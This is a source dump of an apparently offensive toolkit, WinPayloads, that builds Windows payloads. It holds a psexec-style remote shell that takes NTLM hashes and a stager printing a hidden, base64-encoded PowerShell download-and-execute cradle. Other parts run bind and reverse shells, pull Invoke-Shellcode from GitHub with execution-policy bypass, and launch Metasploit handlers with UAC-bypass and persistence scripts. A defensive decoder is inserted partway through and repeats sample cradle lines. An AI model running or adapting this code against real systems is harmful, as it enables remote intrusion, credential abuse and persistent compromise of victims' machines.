            try:
                ans = self.server.readFile(self.tid,self.fid, 0, 1024)
            except:
                pass
            else:
                try:
                    sys.stderr.write(str(ans))
                    sys.stderr.flush()
                except:
                    pass

class RemoteShell(cmd.Cmd):
    def __init__(self, server, port, credentials, tid, fid, share, transport):
        cmd.Cmd.__init__(self, False)
        self.prompt = '\x08'
        self.server = server
        self.transferClient = None
        self.tid = tid
        self.fid = fid
        self.credentials = credentials
        self.share = share
        self.port = port
        self.transport = transport
        self.intro = '[!] Press help for extra shell commands'

    def connect_transferClient(self):
        #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
        self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
        user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
        if self.transport.get_kerberos() is True:
            self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
        else:
            self.transferClient.login(user, passwd, domain, lm, nt)

    def do_help(self, line):
        print """
 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (%s)
 get {file}                 - downloads pathname RELATIVE to the connected share (%s) to the current local dir
 ! {cmd}                    - executes a local shell cmd
""" % (self.share, self.share)
        self.send_data('\r\n', False)

    def do_shell(self, s):
        os.system(s)
        self.send_data('\r\n')

    def do_get(self, src_path):
        try:
            if self.transferClient is None:
                self.connect_transferClient()

            import ntpath
            filename = ntpath.basename(src_path)
            fh = open(filename,'wb')
            logging.info("Downloading %s\%s" % (self.share, src_path))
            self.transferClient.getFile(self.share, src_path, fh.write)
            fh.close()
        except Exception, e:
            logging.critical(str(e))
            pass

        self.send_data('\r\n')

    def do_put(self, s):
        try:
            if self.transferClient is None:
                self.connect_transferClient()
            params = s.split(' ')
            if len(params) > 1:
                src_path = params[0]
                dst_path = params[1]
            elif len(params) == 1:
                src_path = params[0]
                dst_path = '/'

            src_file = os.path.basename(src_path)
            fh = open(src_path, 'rb')
            f = dst_path + '/' + src_file
            pathname = string.replace(f,'/','\\')
            logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path))
            self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)
            fh.close()
        except Exception, e:
            logging.error(str(e))
            pass

        self.send_data('\r\n')

    def do_lcd(self, s):
        if s == '':
            print os.getcwd()
        else:
            os.chdir(s)
        self.send_data('\r\n')

    def emptyline(self):
        self.send_data('\r\n')
        return

    def default(self, line):
        self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\r\n')

    def send_data(self, data, hideOutput = True):
        if hideOutput is True:
            global LastDataSent
            LastDataSent = data
        else:
            LastDataSent = ''
        self.server.writeFile(self.tid, self.fid, data)

class RemoteStdInPipe(Pipes):
    def __init__(self, transport, pipe, permissions, share=None):
        self.shell = None
        Pipes.__init__(self, transport, pipe, permissions, share)

    def run(self):
        self.connectPipe()
        self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
        self.shell.cmdloop()

# Process command-line arguments.
if __name__ == '__main__':
    # Init the example's logger theme
    #logger.init()
    print version.BANNER

    parser = argparse.ArgumentParser(add_help = True, description = "PSEXEC like functionality example using RemComSvc.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
    parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)')
    parser.add_argument('-c', action='store',metavar = "pathname", help='copy the filename for later execution, arguments are passed in the command option')
    parser.add_argument('-path', action='store', help='path of the command to execute')
    parser.add_argument('-file', action='store', help="alternative RemCom binary (be sure it doesn't require CRT)")
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if domain is None:
        domain = ''

    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        password = getpass("Password:")

    if options.aesKey is not None:
        options.k = True

    command = ' '.join(options.command)
    if command == ' ':
        command = 'cmd.exe'

    executer = PSEXEC(command, options.path, options.file, options.c, None, username, password, domain, options.hashes, options.aesKey, options.k)
    executer.run(address)

--------------------------------------------------------------------------------
/lib/stager.py:
--------------------------------------------------------------------------------
from __future__ import unicode_literals
from main import *
from menu import *
from prompt_toolkit.contrib.completers import WordCompleter

history = prompt_toolkit.history.InMemoryHistory()

serverlist = []

def printListener():
    from listener import Server
    while True:
        bindOrReverse = raw_input(t.bold_green + '[?] (b)ind/[r]everse: ' + t.normal).lower()
        if bindOrReverse == 'b' or bindOrReverse == 'r':
            break
    if bindOrReverse == 'r':
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('False', FUNCTIONS().CheckInternet(), '5555')
    else:
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('True', '', '5556')

    powershellFileName = 'p.ps1'
    with open((payloaddir()+ '/' + powershellFileName), 'w') as powershellStagerFile:
        powershellStagerFile.write(windows_powershell_stager)
        powershellStagerFile.close()
    randoStagerDLPort = random.randint(5000,9000)
    FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(), powershellFileName, payloaddir(), port=randoStagerDLPort, printIt = False)
    print 'powershell -w hidden -noni -enc ' + ("IEX (New-Object Net.Webclient).DownloadString('http://" + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" + powershellFileName + "')").encode('utf_16_le').encode('base64').replace('\n','')

    if bindOrReverse == 'b':
        if not '5556' in str(serverlist):
            ipADDR = raw_input(t.bold_green + '[?] IP After Run Bind Shell on Target: ' + t.normal)
            connectserver = Server(ipADDR, 5556, bindsocket=False)
            serverlist.append(connectserver)
    else:
        if not '5555' in str(serverlist):
            listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
            serverlist.append(listenerserver)
    return "pass"


def interactShell(clientnumber):
    clientnumber = int(clientnumber)
    from menu import clientMenuOptions
    for server in serverlist:
        if clientnumber in server.handlers.keys():
            print "Commands\n" + "-"*50 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*50
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                command = prompt_toolkit.prompt("PS >", completer=WordCompleter(['back', 'exit']), history=history)
                if command.lower() == "back":
                    break
                if command.lower() == "exit":
                    server.handlers[clientnumber].handle_close()
                    del clientMenuOptions[str(clientnumber)]
                    time.sleep(2)
                    break
                if command == "":
                    server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"", "sendoutput":""}')
                else:
                    json = '{"type":"exec", "data":"%s", "sendoutput":"true"}'% ((base64.b64encode(command.encode('utf_16_le'))))
                    server.handlers[clientnumber].out_buffer.append(json)
                    while not server.handlers[clientnumber].in_buffer:
                        time.sleep(0.01)
                    print server.handlers[clientnumber].in_buffer.pop()


    return "clear"

def returnServerList():
    return serverlist

def clientUpload(fileToUpload,clientnumber,powershellExec,isExe):
    from menu import clientMenuOptions
    clientnumber = int(clientnumber)

    if isExe:
        newpayloadlayout = FUNCTIONS().powershellShellcodeLayout(powershellExec)
        encPowershell = "IEX(New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Shellcode -Force -Shellcode @(%s)"%newpayloadlayout.rstrip(',')
        encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE'))
        fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}"%(encPowershell,encPowershell)
        b64Exec = base64.b64encode(fullExec.encode('UTF-16LE'))
        lenb64 = len(b64Exec)

        maxlen = 10000
        if lenb64 > maxlen:
            current_length = 0
            numberOfPackets = int(lenb64 / maxlen)
            if lenb64 % maxlen != 0:
                numberOfPackets += 1
            print "number of staged packets: " + str(numberOfPackets)

            while current_length < lenb64:
                cutlength = maxlen
                if lenb64 < current_length + maxlen:
                    cutlength = lenb64 - current_length

                tmp_str = b64Exec[current_length:current_length + cutlength]
                current_length += maxlen
                time.sleep(0.5)
                for server in serverlist:
                    if clientnumber in server.handlers.keys():
                        server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'% (tmp_str))
                        print "sending exec packet!"
            time.sleep(0.5)
            for server in serverlist:
                if clientnumber in server.handlers.keys():
                    server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}')

        else:
            powershellExec = '{"type":"", "data":"%s", "sendoutput":"false", "multiple":""}'% (base64.b64encode(fullExec.encode('utf_16_le')))
    else:
        for server in serverlist:
            if clientnumber in server.handlers.keys():
                server.handlers[clientnumber].out_buffer.append(powershellExec)
    return clientnumber

--------------------------------------------------------------------------------
/lib/startmetasploit.py:
--------------------------------------------------------------------------------
import os

class METASPLOIT(object):
    def __init__(self):
        # os.geteuid must be called; comparing the function object to 0 was always False
        if os.geteuid() == 0:
            self.placeholder = ''
        else:
            self.placeholder = 'sudo '

    ########Reverse########
    def metrev_uac(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
    def metrev_allchecks(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
    def metrev_persistence(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
    def metrev_normal(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum))
    ########Bind########
    def metbind_uac(self,bindport,bindip):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
    def metbind_allchecks(self,bindport,bindip):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
    def metbind_persistence(self,bindport,bindip):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
    def metbind_normal(self,bindport,bindip):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set ExitOnSession false; exploit -j \'' % (self.placeholder, bindport, bindip))
    ########Http########
    def methttps_uac(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
    def methttps_allchecks(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
    def methttps_persistence(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
    def methttps_normal(self,portnum):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' % (self.placeholder, portnum))
    ########DNS########
    def metdns_uac(self,portnum,DNSaddr):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
    def metdns_allchecks(self,portnum,DNSaddr):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
    def metdns_persistence(self,portnum,DNSaddr):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
    def metdns_normal(self,portnum,DNSaddr):
        os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
    ########NC#######
    def nclisterner(self,portnum):
        os.system('%snc -lvp %s'%(self.placeholder, portnum))

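A detection-side helper, added here as an example and not part of WinPayloads: it decodes the `powershell -enc` launch strings that lib/stager.py and lib/preparepayload.py print (including the `-exec bypass -enc` layer nested inside another `-enc` by clientUpload) and flags the cradle patterns those scripts carry. The sample command lines are constructed to mirror the project's output; the IP, port and URLs are placeholders.

```python
"""Decode `powershell -enc` launch strings and flag the cradle patterns this
project's stager and uploader place inside them (detection-side helper)."""
import base64
import re

# -e / -en / -enc / -EncodedCommand followed by a base64 blob, optionally quoted.
ENC_ARG = re.compile(r'(?i)(?<![\w-])[-/](?:e|en|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]{16,})"?')

# Substrings that lib/stager.py and lib/preparepayload.py build into the encoded script.
INDICATORS = {
    "download_cradle": re.compile(r"(?i)New-Object\s+Net\.WebClient\)\.Download(?:String|File)\("),
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "invoke_shellcode": re.compile(r"(?i)Invoke-Shellcode"),
    "exec_policy_bypass": re.compile(r"(?i)-exec(?:utionpolicy)?\s+bypass"),
    "syswow64_powershell": re.compile(r"(?i)SysWOW64\\WindowsPowerShell"),
}
# Window-hiding / non-interactive switches seen on the outer command line.
STEALTH_FLAGS = re.compile(r"(?i)(?<![\w-])-(?:w(?:indowstyle)?\s+hidden|noni(?:nteractive)?|nop(?:rofile)?)")


def decode_encoded_command(blob):
    """Return the UTF-16LE script behind one -enc argument, or None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_layers(cmdline, max_depth=5):
    """Peel every -enc layer: [outer cmdline, decoded script, its inner script, ...].

    clientUpload() in lib/stager.py wraps an -enc payload inside another -enc
    payload, so stopping after one decode would miss the script that matters.
    """
    layers = [cmdline]
    for _ in range(max_depth):
        decoded = None
        for m in ENC_ARG.finditer(layers[-1]):
            decoded = decode_encoded_command(m.group(1))
            if decoded is not None:
                break
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def scan_commandline(cmdline):
    """Summarise one process-creation command line (Sysmon 1 / 4688 style) for triage."""
    layers = decode_layers(cmdline)
    hits = {name for text in layers for name, rx in INDICATORS.items() if rx.search(text)}
    return {
        "encoded_layers": len(layers) - 1,
        "indicators": sorted(hits),
        "stealth_flags": sorted(f.lower() for f in STEALTH_FLAGS.findall(cmdline)),
        "innermost": layers[-1],
    }


def encode_for_enc(script):
    """Encode a script the way lib/stager.py does: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (not from any real log). They mirror the launch strings the
# project prints; the IP, port and URLs are placeholders.
STAGER_STYLE = "powershell -w hidden -noni -enc " + encode_for_enc(
    "IEX (New-Object Net.Webclient).DownloadString('http://192.0.2.10:6123/p.ps1')")
_inner = encode_for_enc("IEX(New-Object Net.WebClient).DownloadString("
                        "'https://example.invalid/Invoke-Shellcode.ps1');Invoke-Shellcode -Force")
NESTED_STYLE = "powershell.exe -WindowStyle Hidden -enc " + encode_for_enc(
    "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];"
    "if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}"
    "elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';"
    "& $powershell86 -exec bypass -enc \"%s\"}" % (_inner, _inner))
BENIGN = "powershell.exe -NoProfile -EncodedCommand " + encode_for_enc(
    "Get-Date | Out-File C:\\Temp\\date.txt")

if __name__ == "__main__":
    for label, sample in (("stager", STAGER_STYLE), ("nested", NESTED_STYLE), ("benign", BENIGN)):
        result = scan_commandline(sample)
        print(label, result["encoded_layers"], result["indicators"], result["stealth_flags"])
```

The benign sample shows why the switches alone are a weak signal: `-NoProfile` is flagged, but no cradle indicator fires once the script is decoded.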
--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
#!/bin/bash
########
winpayloadsdir=$(pwd)

reinstall=0
for i in "$@"
do
    case $i in
        -r)
        reinstall=1
        shift
        ;;
    esac
done
########


echo -e '\033[1;32m[*] Installing Dependencies \033[0m'
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get -y install winbind unzip wget git python2.7 python python-crypto python-pefile python-pip

echo -e '\033[1;32m[*] Installing Wine \033[0m'
sudo apt-get -y install wine32
sudo apt-get -y install wine

echo -e '\033[1;32m[*] Installing Python Requirements \033[0m'
sudo pip install blessed
sudo pip install pyasn1
sudo pip install --upgrade --force-reinstall prompt_toolkit

echo -e '\033[1;32m[*] Downloading Python27, Pywin32 and Pycrypto For Wine \033[0m'
# "~" is not expanded inside double quotes, so the original test never saw an existing install; use $HOME
if [[ ! -d "$HOME/.wine/drive_c/Python27/" || $reinstall -eq 1 ]]; then
    wget https://www.python.org/ftp/python/2.7.10/python-2.7.10.msi
    # quote the Windows path so bash does not strip the backslash
    wine msiexec /i python-2.7.10.msi 'TARGETDIR=C:\Python27' ALLUSERS=1 /q
    wget http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win32-py2.7.exe
    unzip pycrypto-2.6.win32-py2.7.exe
    wget https://download.microsoft.com/download/1/1/1/1116b75a-9ec3-481a-a3c8-1777b5381140/vcredist_x86.exe
    wine vcredist_x86.exe /qb!
    wget https://sourceforge.net/projects/pywin32/files/pywin32/Build%20220/pywin32-220.win32-py2.7.exe/download
    mv download pywin32.exe
    unzip pywin32.exe
    cp -rf PLATLIB/* ~/.wine/drive_c/Python27/Lib/site-packages/
    cp -rf SCRIPTS/* ~/.wine/drive_c/Python27/Lib/site-packages/
    cp -rf SCRIPTS/* ~/.wine/drive_c/Python27/Scripts/
    wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pywin32_postinstall.py -install -silent
else
    echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m'
fi

echo -e '\033[1;32m[*] Installing Pyinstaller \033[0m'
if [[ ! -d "/opt/pyinstaller" || $reinstall -eq 1 ]]; then
    if [ -d "/opt/pyinstaller/.git" ]; then
        rm /opt/pyinstaller -rf
    fi
    curl -O -L https://github.com/pyinstaller/pyinstaller/releases/download/v3.2.1/PyInstaller-3.2.1.zip
    unzip PyInstaller-3.2.1.zip -d /opt
    mv /opt/PyInstaller-3.2.1 /opt/pyinstaller
    cd /opt/pyinstaller
    wine ~/.wine/drive_c/Python27/python.exe setup.py install
    cd $winpayloadsdir

else
    echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m'
fi


echo -e '\033[1;32m[*] Installing impacket from Git \033[0m'
if [[ ! -d "/usr/local/lib/python2.7/dist-packages/impacket" || $reinstall -eq 1 ]]; then
    git clone https://github.com/CoreSecurity/impacket.git
    cd impacket
    python2.7 setup.py install
    cd ..
else
    echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m'
fi

echo -e '\033[1;32m[*] Grabbing Wine Modules \033[0m'
wine ~/.wine/drive_c/Python27/Scripts/pip.exe install pefile
wine ~/.wine/drive_c/Python27/Scripts/pip.exe install dis3
echo -e '\033[1;32m[*] Done \033[0m'


echo -e '\033[1;32m[*] Grabbing Modules \033[0m'
cd lib
rm psexecspray.py
curl -O https://raw.githubusercontent.com/Charliedean/PsexecSpray/master/psexecspray.py
cd ..
echo -e '\033[1;32m[*] Done \033[0m'

echo -e '\033[1;32m[*] Grabbing Certs \033[0m'
openssl genrsa -out server.pass.key 2048
openssl rsa -in server.pass.key -out server.key
openssl req -new -key server.key -out server.csr -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com"
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
rm server.csr server.pass.key
echo -e '\033[1;32m[*] Done \033[0m'


echo -e '\033[1;32m[*] Cleaning Up \033[0m'
rm python-2.7.10.msi PyInstaller-3.2.1.zip pycrypto-2.6.win32-py2.7.exe vcredist_x86.exe pywin32.exe PLATLIB SCRIPTS impacket -rf
echo -e '\033[1;32m[*] Done \033[0m'
--------------------------------------------------------------------------------